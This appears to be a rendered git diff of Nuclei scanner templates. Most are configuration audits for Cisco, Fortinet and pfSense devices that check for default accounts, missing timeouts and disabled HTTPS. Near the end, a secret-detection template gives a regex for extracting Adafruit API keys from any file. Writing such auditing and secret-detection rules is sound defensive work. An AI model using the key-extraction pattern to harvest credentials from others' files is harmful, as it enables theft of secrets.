- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
|
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file,router
|
tags: cisco,config-audit,cisco-switch,file,router
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -24,3 +28,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "configure terminal"
|
- "configure terminal"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: configure-service-timestamps-debug
|
id: configure-service-timestamps-debug
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure Service Timestamps for Debug
|
name: Cisco Configure Service Timestamps for Debug - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
|
The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
|
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file,router
|
tags: cisco,config-audit,cisco-switch,file,router
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -24,3 +28,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "configure terminal"
|
- "configure terminal"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: configure-service-log-messages
|
id: configure-service-log-messages
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure Service Timestamps Log Messages
|
name: Cisco Configure Service Timestamps Log Messages - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
|
Cisco service timestamp configuration for log messages was not implemented.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
|
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file,router
|
tags: cisco,config-audit,cisco-switch,file,router
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -24,3 +28,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "configure terminal"
|
- "configure terminal"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/02
|
||||||
|
|
|
@ -1,13 +1,18 @@
|
||||||
id: disable-ip-source-route
|
id: disable-ip-source-route
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Disable IP source-route
|
name: Cisco Disable IP Source-Route - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled.
|
Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
|
remediation: Disable IP source-route where appropriate.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
|
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file,router
|
tags: cisco,config-audit,cisco-switch,file,router
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: disable-pad-service
|
id: disable-pad-service
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Disable PAD service
|
name: Cisco Disable PAD - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service.
|
Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.
|
||||||
reference:
|
reference:
|
||||||
- http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
|
- http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file,router
|
tags: cisco,config-audit,cisco-switch,file,router
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: logging-enable
|
id: logging-enable
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Logging enable
|
name: Cisco Logging Enable - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices.
|
Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
|
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file
|
tags: cisco,config-audit,cisco-switch,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -24,3 +28,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "configure terminal"
|
- "configure terminal"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: set-and-secure-passwords
|
id: set-and-secure-passwords
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Set and secure passwords
|
name: Cisco Set and Secure Password - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.
|
Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.
|
||||||
reference:
|
reference:
|
||||||
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514
|
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: cisco,config-audit,cisco-switch,file
|
tags: cisco,config-audit,cisco-switch,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -24,3 +28,5 @@ file:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "configure terminal"
|
- "configure terminal"
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: auto-usb-install
|
id: auto-usb-install
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Auto USB Installation Enabled
|
name: Fortinet Auto USB Installation Enabled - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
|
description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -26,3 +30,5 @@ file:
|
||||||
- "config router"
|
- "config router"
|
||||||
- "config firewall"
|
- "config firewall"
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,11 +1,16 @@
|
||||||
id: heuristic-scan
|
id: heuristic-scan
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Heuristic scanning is not configured
|
name: Fortinet Heuristic Scanning not Configured - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
|
description: |
|
||||||
|
Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -26,3 +31,5 @@ file:
|
||||||
- "config router"
|
- "config router"
|
||||||
- "config firewall"
|
- "config firewall"
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: inactivity-timeout
|
id: inactivity-timeout
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Inactivity Timeout Not Implemented
|
name: Fortinet Inactivity Timeout Not Implemented - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
|
description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -25,3 +29,5 @@ file:
|
||||||
- "config router"
|
- "config router"
|
||||||
- "config firewall"
|
- "config firewall"
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/03
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: maintainer-account
|
id: maintainer-account
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Maintainer Account Not Implemented
|
name: Fortinet Maintainer Account Not Implemented - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
|
description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: password-policy
|
id: password-policy
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Password Policy not Set
|
name: Fortinet Password Policy Not Set - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
|
description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: fortigate,config,audit,file,firewall
|
tags: fortigate,config,audit,file,firewall
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,11 +1,16 @@
|
||||||
id: remote-auth-timeout
|
id: remote-auth-timeout
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Remote Authentication timeout not set
|
name: Fortinet Remote Authentication Timeout Not Set - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
|
description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
reference:
|
||||||
|
- https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: scp-admin
|
id: scp-admin
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Admin-SCP Disabled
|
name: Fortinet Admin-SCP Disabled - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
|
description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file.
|
||||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,fortigate
|
tags: audit,config,file,firewall,fortigate
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: configure-dns-server
|
id: configure-dns-server
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure DNS Server
|
name: DNS Server Not Implemented - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
The purpose DNs server is to perform the resolution of system hostnames to Internet Protocol (IP) addresses.
|
DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers.
|
||||||
reference: |
|
reference: |
|
||||||
https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html
|
https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: firewall,config,audit,pfsense,file
|
tags: firewall,config,audit,pfsense,file
|
||||||
|
@ -28,3 +32,5 @@ file:
|
||||||
- "<pfsense>"
|
- "<pfsense>"
|
||||||
- "<system>"
|
- "<system>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: configure-session-timeout
|
id: configure-session-timeout
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure Sessions Timeout
|
name: PfSence Configure Sessions Timeout Not Set - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Indefinite or even long session timeout window increase the risk of attackers abusing abandoned sessions.
|
Configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
reference: |
|
reference: |
|
||||||
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: firewall,config,audit,pfsense,file
|
tags: firewall,config,audit,pfsense,file
|
||||||
|
@ -31,3 +35,5 @@ file:
|
||||||
- "<webgui>"
|
- "<webgui>"
|
||||||
- "<system>"
|
- "<system>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,14 +1,17 @@
|
||||||
id: enable-https-protocol
|
id: enable-https-protocol
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Enable HTTPS on Web Management
|
name: Pfsence Web Admin Management Portal HTTPS Not Set - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Web Admin Management Portal should only be accessed using HTTPS Protocol.HTTP transmits all data (including passwords) in clear text over the network and
|
PfSence Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
provides no assurance of the identity of the hosts involved.
|
|
||||||
reference: |
|
reference: |
|
||||||
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: firewall,config,audit,pfsense,file
|
tags: firewall,config,audit,pfsense,file
|
||||||
|
@ -31,3 +34,5 @@ file:
|
||||||
- "<pfsense>"
|
- "<pfsense>"
|
||||||
- "<system>"
|
- "<system>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,16 +1,17 @@
|
||||||
id: known-default-account
|
id: known-default-account
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Known Default Account - Detect
|
name: PfSence Known Default Account - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
In order to attempt access to known devices' platforms, attackers use the available database of the known default accounts for each platform or Operating System.
|
PfSence configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'.
|
||||||
The known default accounts are often (without limiting to) the following: 'admin'.
|
|
||||||
reference: |
|
reference: |
|
||||||
- https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
|
- https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
|
||||||
remediation: |
|
classification:
|
||||||
Deletes the known default accounts configured.
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: audit,config,file,firewall,pfsense
|
tags: audit,config,file,firewall,pfsense
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -25,3 +26,5 @@ file:
|
||||||
- "<descr><![CDATA[System Administrator]]></descr>"
|
- "<descr><![CDATA[System Administrator]]></descr>"
|
||||||
- "<priv>user-shell-access</priv>"
|
- "<priv>user-shell-access</priv>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,13 +1,17 @@
|
||||||
id: password-protected-consolemenu
|
id: password-protected-consolemenu
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Configure Password Protected on Console Menu
|
name: PfSence Consolemenu Password Protection Not Implememnted - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
An unattended computer with an open Console Menu session to the device could allow an unauthorized user access to the firewall’s management.
|
PfSence password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management.
|
||||||
reference: |
|
reference: |
|
||||||
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: firewall,config,audit,pfsense,file
|
tags: firewall,config,audit,pfsense,file
|
||||||
|
@ -31,3 +35,5 @@ file:
|
||||||
- "<webgui>"
|
- "<webgui>"
|
||||||
- "<system>"
|
- "<system>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,14 +1,17 @@
|
||||||
id: set-hostname
|
id: set-hostname
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Ensure Hostname is Set
|
name: PfSence Hostname Not Set - Detect
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: info
|
severity: info
|
||||||
description: |
|
description: |
|
||||||
Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network.
|
PfSence Hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device.
|
||||||
The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it.
|
|
||||||
reference: |
|
reference: |
|
||||||
https://docs.netgate.com/pfsense/en/latest/config/general.html
|
https://docs.netgate.com/pfsense/en/latest/config/general.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: firewall,config,audit,pfsense,file
|
tags: firewall,config,audit,pfsense,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
@ -23,3 +26,5 @@ file:
|
||||||
- "<hostname></hostname>"
|
- "<hostname></hostname>"
|
||||||
- "domain>"
|
- "domain>"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by md on 2023/05/04
|
||||||
|
|
|
@ -1,11 +1,15 @@
|
||||||
id: electron-version-detect
|
id: electron-version-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Electron Version Detect
|
name: Electron Version - Detect
|
||||||
author: me9187
|
author: me9187
|
||||||
severity: info
|
severity: info
|
||||||
reference:
|
reference:
|
||||||
- https://www.electronjs.org/blog/chromium-rce-vulnerability/
|
- https://www.electronjs.org/blog/chromium-rce-vulnerability/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
tags: electron,file
|
tags: electron,file
|
||||||
|
|
||||||
file:
|
file:
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: adafruit-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adafruit API Key
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml
|
||||||
|
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: adafruit,file,keys
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: adobe-client
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe Client ID
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
